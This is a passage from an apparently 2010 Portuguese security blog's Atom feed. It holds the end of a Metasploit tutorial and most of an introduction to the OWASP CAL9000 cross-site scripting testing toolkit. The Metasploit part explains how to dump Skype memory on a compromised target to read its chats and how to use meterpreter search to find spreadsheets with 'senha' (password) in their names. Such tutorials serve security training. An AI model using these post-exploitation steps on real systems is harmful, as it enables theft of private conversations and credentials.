/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Esperamos o termino e ele nos diz onde foi salvo o dump.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/TKk1Dw1VcTI/AAAAAAAAAQk/jO8wVytkQeA/s1600/dump_skype.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524004756711108914" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TKk1Dw1VcTI/AAAAAAAAAQk/jO8wVytkQeA/s320/dump_skype.jpg" style="cursor: pointer; display: block; height: 227px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pronto! Após o termino, vamos abrir uma nova shell e deixar o dump gerado mais "legível", para isso utilizamos o comando "strings", veja abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1TiWPh6I/AAAAAAAAAQs/FoQ_M-ZFFGs/s1600/dumping_skype.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524005027700508578" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1TiWPh6I/AAAAAAAAAQs/FoQ_M-ZFFGs/s320/dumping_skype.jpg" style="cursor: pointer; display: block; height: 69px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:~# cat dumping_skype.txt | grep "#robertoespreto" | more&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Basta trocar "robertoespreto" pelo login correto.&lt;br /&gt;&lt;br /&gt;Existe também um software chamado Skypeex, com ele você poderá visualizar de uma forma mais amigável este arquivo .txt. Segue o link para auto-estudo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://csitraining.co.uk/skypex.aspx"&gt;http://csitraining.co.uk/skypex.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Procurando por arquivos.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ok, vamos conectar novamente em nosso alvo para procurarmos arquivos "interessantes". Utilize a forma que achar melhor para se conectar novamente, digitando todos os comandos ou através do arquivo resource file, fica a seu critério! :)&lt;br /&gt;&lt;br /&gt;Certo, de posse da shell meterpreter novamente, vamos usando o comando "search" para procurarmos por extensões conhecidas de arquivos, por exemplo, .xls do excel. Use o "-h" para visualizar os parâmetros do search.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1hGDFnCI/AAAAAAAAAQ0/fEmYPzf7ujk/s1600/search_h.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524005260622142498" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1hGDFnCI/AAAAAAAAAQ0/fEmYPzf7ujk/s320/search_h.jpg" style="cursor: pointer; display: block; height: 98px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ok, como já disse, vamos procurar por arquivos criados com o excel, ou seja, os arquivos que tenha extensão .xls. Veja na figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1r7MirZI/AAAAAAAAAQ8/i4MOjNA60W4/s1600/search_xls.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524005446687567250" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk1r7MirZI/AAAAAAAAAQ8/i4MOjNA60W4/s320/search_xls.jpg" style="cursor: pointer; display: block; height: 161px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Os parâmetros:&lt;br /&gt;&lt;br /&gt;A opção "-d c:\\" diz que vamos procurar a partir da unidade C:.&lt;br /&gt;A opção "-f *.xls" diz que vamos procurar por todos os arquivos que tiver a extensão .xls.&lt;br /&gt;A opção "-r true" diz que a procura incluirá todos os subdiretórios além do atual.&lt;br /&gt;&lt;br /&gt;Agora, eu quero pesquisar somente os arquivos .xls que esteja na area de trabalho do alvo. Eu também sei que uma parte do nome do arquivo possui a palavra "senha". Como ficaria a sintaxe?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk174FCAFI/AAAAAAAAARE/TZAtuvLeY9A/s1600/search_senha.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524005720728666194" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk174FCAFI/AAAAAAAAARE/TZAtuvLeY9A/s320/search_senha.jpg" style="cursor: pointer; display: block; height: 45px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Usem a imaginação, procurem por outras extensões. :)&lt;br /&gt;&lt;br /&gt;Guardem estes pequenos conceitos deste artigo para continuarmos na parte 2.&lt;br /&gt;Acabou sua cerveja quando chegou aqui? Ah, busque mais e seja feliz! Ah, vale ir de refrigerante também.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dúvidas? Sugestões?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Roberto Soares (espreto)&lt;br /&gt;codesec.blogspot.com&lt;br /&gt;&lt;a href="http://www.backtrack.com.br/"&gt;www.backtrack.com.br&lt;/a&gt;&lt;br /&gt;robertoespreto@gmail.com&lt;br /&gt;espreto@backtrack.com.br&lt;br /&gt;Follow @espreto&lt;br /&gt;®&lt;br /&gt;&lt;br /&gt;Finish!&lt;br /&gt;&lt;/windows.h&gt;&lt;/winsock.h&gt;&lt;/iostream.h&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-7799711326845408692?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/7799711326845408692/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/09/introducao-ao-metasploit-parte-01.html#comment-form' title='2 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/7799711326845408692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/7799711326845408692'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/09/introducao-ao-metasploit-parte-01.html' title='Introduçao ao Metasploit - Parte 01'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_fzuc26ZLs28/TKkwzO3xSPI/AAAAAAAAAOc/NCh_fmkIC0Y/s72-c/msfconsole1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-3551737765112151494</id><published>2010-09-19T10:56:00.038-03:00</published><updated>2010-10-09T17:21:51.287-03:00</updated><title type='text'>CAL9000 - Web Application Security Testing Assistant - Introdução</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYXKRgMBkI/AAAAAAAAAKk/p8wIN1VKGTk/s1600/ScreenShot001.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 188px; height: 151px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYXKRgMBkI/AAAAAAAAAKk/p8wIN1VKGTk/s320/ScreenShot001.jpg" alt="" id="BLOGGER_PHOTO_ID_5518623858653660738" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYXbWdZCrI/AAAAAAAAAKs/7oYpyw6K_TA/s1600/ScreenShot002.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 182px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYXbWdZCrI/AAAAAAAAAKs/7oYpyw6K_TA/s320/ScreenShot002.jpg" alt="" id="BLOGGER_PHOTO_ID_5518624152041884338" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;APRESENTAÇÃO&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CAL9000 é uma coleção de ferramentas de testes de segurança para aplicações Web, que&lt;br /&gt;complementa os recursos atuais de web proxies e scanners automatizados. CAL9000 lhe dá a flexibilidade e funcionalidade que você precisará para testes manuais mais eficazes e menos esforços. Funciona melhor quando usado com os navegadores Firefox ou Internet Explorer. (Recomendo Firefox :P)&lt;br /&gt;&lt;br /&gt;CAL900 é escrito em JavaScript, então você terá acesso total ao código-fonte. Sinta-se livre para modificá-lo para melhor atender as suas necessidades específicas. CAL9000 tem algumas características poderosas (como a execução cross-domain xmlHttpRequests e escrita para o disco).&lt;br /&gt;Dedique alguns momentos para verificar as funcionalidades desta ferramenta.&lt;br /&gt;&lt;br /&gt;Usaremos o CAL9000 para demonstrar os usos de uma ferramenta de testes de exploração. Como a maioria das ferramentas se concentra em algum tipo específico de ataque. Neste caso, seu foco principal é sobre ataques Cross-Site Scripting.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;OBTENDO O CAL9000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Você pode baixá-lo no endereço &lt;a href="http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project"&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;/span&gt;&lt;/a&gt;, como mostrado na figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYX_Fh-YlI/AAAAAAAAAK0/QlFE4X2bhHo/s1600/ScreenShot003.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 217px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYX_Fh-YlI/AAAAAAAAAK0/QlFE4X2bhHo/s320/ScreenShot003.jpg" alt="" id="BLOGGER_PHOTO_ID_5518624765972996690" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;Obs.:&lt;/span&gt; Se estiverem com dificuldades para efetuar o download, acessem o 3º link apresentado ao final deste artigo ou me enviem um e-mail para que eu possa disponibilizar a quem necessitar.&lt;br /&gt;&lt;br /&gt;Quando o download estiver concluído,descompacte o arquivo e abra o arquivo CAL9000.html no seu navegador da Web, como mostrado na figura 2. Firefox (disponível a partir de &lt;a href="http://www.mozilla.com/firefox/"&gt;http://www.mozilla.com/firefox/&lt;/a&gt;) É o browser recomendado para uso com CAL9000.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYYguG3xsI/AAAAAAAAAK8/Bcd4evM-SYA/s1600/ScreenShot001.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 162px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYYguG3xsI/AAAAAAAAAK8/Bcd4evM-SYA/s320/ScreenShot001.jpg" alt="" id="BLOGGER_PHOTO_ID_5518625343800854210" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Neste ponto, você obteve com sucesso o conjunto de ferramentas de teste CAL9000. Na próxima seção, vamos caminhar com o que você pode fazer com CAL9000.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;USANDO O CAL9000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CAL9000 é uma coleção de nove ferramentas que são usadas para testar aplicações web para vulnerabilidades de segurança, especificamente cross-site scripting. Você pode usar algumas destas ferramentas para testar outros tipos de vulnerabilidades, mas o foco principal deste conjunto de ferramentas está no cross-site scripting. Nesta seção, nós vamos levá-lo através da interface CAL9000 e descrever cada um das nove ferramentas:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;XSS Attacks&lt;/li&gt;&lt;li&gt;Encode/Decode&lt;/li&gt;&lt;li&gt;HTTP Requests&lt;/li&gt;&lt;li&gt;HTTP Responses&lt;/li&gt;&lt;li&gt;Scratch Pad&lt;/li&gt;&lt;li&gt;Cheat Sheets&lt;/li&gt;&lt;li&gt;Misc Tools&lt;/li&gt;&lt;li&gt;Checklist&lt;/li&gt;&lt;li&gt;AutoAttack&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Vamos começar no topo da lista com a guia de XSS Attacks.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ATAQUES XSS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Na página CAL9000.html, clique na guia XSS Attacks, como mostrado na figura 3.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYZJCicyMI/AAAAAAAAALE/GvRT8uHsjyU/s1600/ScreenShot002.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 166px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYZJCicyMI/AAAAAAAAALE/GvRT8uHsjyU/s320/ScreenShot002.jpg" alt="" id="BLOGGER_PHOTO_ID_5518626036480002242" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 3 - Clique na guia XSS Attacks.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Mostrará a ferramenta de XSS Attacks. Este é um dicionário de XSS Attacks conhecidos. Clique em um dos ataques listados no menu do lado esquerdo da tela, como mostrado na figura 4.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYZoY_YlwI/AAAAAAAAALM/BEqpxft7T-E/s1600/ScreenShot003.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 176px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYZoY_YlwI/AAAAAAAAALM/BEqpxft7T-E/s320/ScreenShot003.jpg" alt="" id="BLOGGER_PHOTO_ID_5518626575082886914" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 4 - Usando a tela de XSS Attacks.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;No lado direito da tela, você verá o código de ataque na caixa de texto superior, e uma descrição do que o ataque é projetado para fazer na caixa de texto inferior. Nesta página, também há um editor que permite criar seu próprio código de ataque personalizado e salvá-la ao dicionário. Há também um testador de expressões regulares na parte inferior da página.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ENCODE/DECODE&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na guia Encode/Decode, como mostrado na figura 5, para apresentar a tela Encode/Decode.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYaAiEPpmI/AAAAAAAAALU/GKUx78OykuU/s1600/ScreenShot004.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 158px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYaAiEPpmI/AAAAAAAAALU/GKUx78OykuU/s320/ScreenShot004.jpg" alt="" id="BLOGGER_PHOTO_ID_5518626989836052066" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 5 - Clique na guia Encode/Decode.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Esta ferramenta permite-lhe codificar texto simples em uma variedade de formas, como mostrado na figura 6.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYaPzlJqQI/AAAAAAAAALc/rbwOTvdMLSU/s1600/ScreenShot005.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 165px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYaPzlJqQI/AAAAAAAAALc/rbwOTvdMLSU/s320/ScreenShot005.jpg" alt="" id="BLOGGER_PHOTO_ID_5518627252235512066" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 6 - Encode de texto simples em hexadecimal.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Isso é mais útil para testar se sua aplicação filtra com sucesso dados codificados. Esta página também pode decodificar os dados em uma variedade de formatos, como mostrado na figura 7.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYalvviOxI/AAAAAAAAALk/FvJ5phe5w_s/s1600/ScreenShot006.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 164px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYalvviOxI/AAAAAAAAALk/FvJ5phe5w_s/s320/ScreenShot006.jpg" alt="" id="BLOGGER_PHOTO_ID_5518627629162445586" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 7 - Decodifica uma string hexadecimal em texto puro.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;A melhor hora para usar isto é, após a sua aplicação ter sido atacada. O decodificador permite que você leia os dados que um hacker usou para “break” em seu site. A menos que você conhece ou sabe a seqüência de caracteres que é codificado, você pode ter que tentar várias decodificações antes de encontrar o sucesso que produz um texto simples.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;HTTP REQUESTS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na guia HTTP Requests, como mostrado na figura 8, para abrir a tela de HTTP Requests.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYa8nDWLjI/AAAAAAAAALs/gSmmEGIJsaI/s1600/ScreenShot007.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 153px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYa8nDWLjI/AAAAAAAAALs/gSmmEGIJsaI/s320/ScreenShot007.jpg" alt="" id="BLOGGER_PHOTO_ID_5518628021966614066" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 8 - Clique na guia HTTP Requests.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;A ferramenta HTTP Requests requer algum conhecimento de como funciona o protocolo&lt;br /&gt;HTTP, pois permite-lhe enviar um cabeçalho HTTP raw, diretamente para um site ou aplicação web. A partir desta ferramenta, você também pode iniciar um AutoAttack contra o seu site. Esta é uma das ferramentas mais avançadas na caixa de ferramentas, então você provavelmente não vai precisar usá-lo para testes básicos. Se você entrar em um teste mais avançado de exploração, clique no botão Ajuda na parte superior da tela para uma explicação mais aprofundada de como esta ferramenta foi projetada, para fazer e como usá-lo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;HTTP RESPONSES&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na guia HTTP Responses, como mostrado na figura 9, para abrir a tela de HTTP Responses.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_fzuc26ZLs28/TJYbVp8N9PI/AAAAAAAAAL0/aVEgojTRuaI/s1600/ScreenShot008.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 160px;" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TJYbVp8N9PI/AAAAAAAAAL0/aVEgojTRuaI/s320/ScreenShot008.jpg" alt="" id="BLOGGER_PHOTO_ID_5518628452238750962" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 9 - Clique na guia HTTP Responses.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Esta ferramenta mostra os cabeçalhos HTTP devolvido pelo seu site e permite que você&lt;br /&gt;visualize os scripts, formulários ou cookies disponíveis na página. A vantagem de utilizar esta ferramenta para analisar o seu site é que essas informações, são as que os crackers estão procurando quando elaborar um ataque contra uma aplicação. Se os crackers estão olhando para esta informação, você também precisa saber o que eles estão vendo. Isso também é útil para testar a segurança do servidor. Como você pode ver no topo da janela na Figura 10, a assinatura do servidor simplesmente diz "Apache", sem informações de versão ou informações sobre PHP ou outros módulos que podem estar em execução. Para utilizar esta ferramenta, digite o endereço do seu site e clique no botão Reload URL.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYbt99iKlI/AAAAAAAAAL8/3mqw5Y6w5dQ/s1600/ScreenShot009.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 177px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYbt99iKlI/AAAAAAAAAL8/3mqw5Y6w5dQ/s320/ScreenShot009.jpg" alt="" id="BLOGGER_PHOTO_ID_5518628869929839186" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 10 - Verifique se a segurança do seu servidor está funcionando corretamente.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Isto diz-nos que a diretiva ServerTokens definida no arquivo httpd.conf está funcionando corretamente. Compare isto com a assinatura de servidor de um site inseguro, como mostrado na figura 11.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYcBav_X_I/AAAAAAAAAME/kuvDbkGH_cU/s1600/ScreenShot010.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 148px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYcBav_X_I/AAAAAAAAAME/kuvDbkGH_cU/s320/ScreenShot010.jpg" alt="" id="BLOGGER_PHOTO_ID_5518629204075175922" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 11 - Assinatura de servidor de um site inseguro.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;SCRATCH PAD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A guia Scratch Pad simplesmente leva você a uma página em branco onde você pode fazer&lt;br /&gt;anotações sobre o que você encontrar usando as ferramentas e escrever lembretes para si mesmo, como mostrado na figura 12.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_fzuc26ZLs28/TJYcWbr2vAI/AAAAAAAAAMM/UT10foOR-WI/s1600/ScreenShot011.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 158px;" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TJYcWbr2vAI/AAAAAAAAAMM/UT10foOR-WI/s320/ScreenShot011.jpg" alt="" id="BLOGGER_PHOTO_ID_5518629565103520770" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 12 - A ferramenta Scratch Pad.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CHEAT SHEETS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na aba Cheat Sheets, como mostrado na figura 13.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYcpY3zIVI/AAAAAAAAAMU/EGWUTDM9Yz0/s1600/ScreenShot012.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 157px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYcpY3zIVI/AAAAAAAAAMU/EGWUTDM9Yz0/s320/ScreenShot012.jpg" alt="" id="BLOGGER_PHOTO_ID_5518629890765824338" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 13 - Clique na guia Cheat Sheets.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Isso traz uma variedade de cheat sheets em várias linguagens e ferramentas que você pode precisar de um desenvolvedor do aplicativo da Web, como mostrado na figura 14.&lt;br /&gt;&lt;br /&gt;Se você precisa usar uma das variáveis predefinidas do PHP, mas não consegue lembrar o nome exato, a cheat sheet para PHP trás para a tela.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYc-KZp98I/AAAAAAAAAMc/2_RjK5Qk7PE/s1600/ScreenShot013.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 155px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYc-KZp98I/AAAAAAAAAMc/2_RjK5Qk7PE/s320/ScreenShot013.jpg" alt="" id="BLOGGER_PHOTO_ID_5518630247658551234" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 14 - Uma das Cheats Sheets incluídas no CAL9000.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;MISC TOOLS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na aba Misc Tools, como mostrado na Figura 15.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYdSA6BQKI/AAAAAAAAAMk/NlbDbdAYcA4/s1600/ScreenShot014.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 154px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYdSA6BQKI/AAAAAAAAAMk/NlbDbdAYcA4/s320/ScreenShot014.jpg" alt="" id="BLOGGER_PHOTO_ID_5518630588707324066" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 15 - Clique na guia Misc Tools.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Isso traz algumas ferramentas que simplesmente não se encaixam em nenhum outro lugar. O Codificador IP e ferramentas String Generator são bastante auto-explicativas. A busca Scroogle, mostrado no lado direito da tela na Figura 16, é um front-end para o motor de busca do Google.&lt;br /&gt;&lt;br /&gt;O Scroogle Search tira das ferramenta todas as informações agregadas que o Google acha antes de enviar sua solicitação de pesquisa para o motor de busca.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYdnnBo1QI/AAAAAAAAAMs/eGmhk_Hkh9k/s1600/ScreenShot015.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 148px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYdnnBo1QI/AAAAAAAAAMs/eGmhk_Hkh9k/s320/ScreenShot015.jpg" alt="" id="BLOGGER_PHOTO_ID_5518630959717078274" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 16 - A ferramenta de busca Scroogle.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CHECKLIST&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Clique na guia Checklist, como mostrado na Figura 17, para abrir a ferramenta Checklist.&lt;br 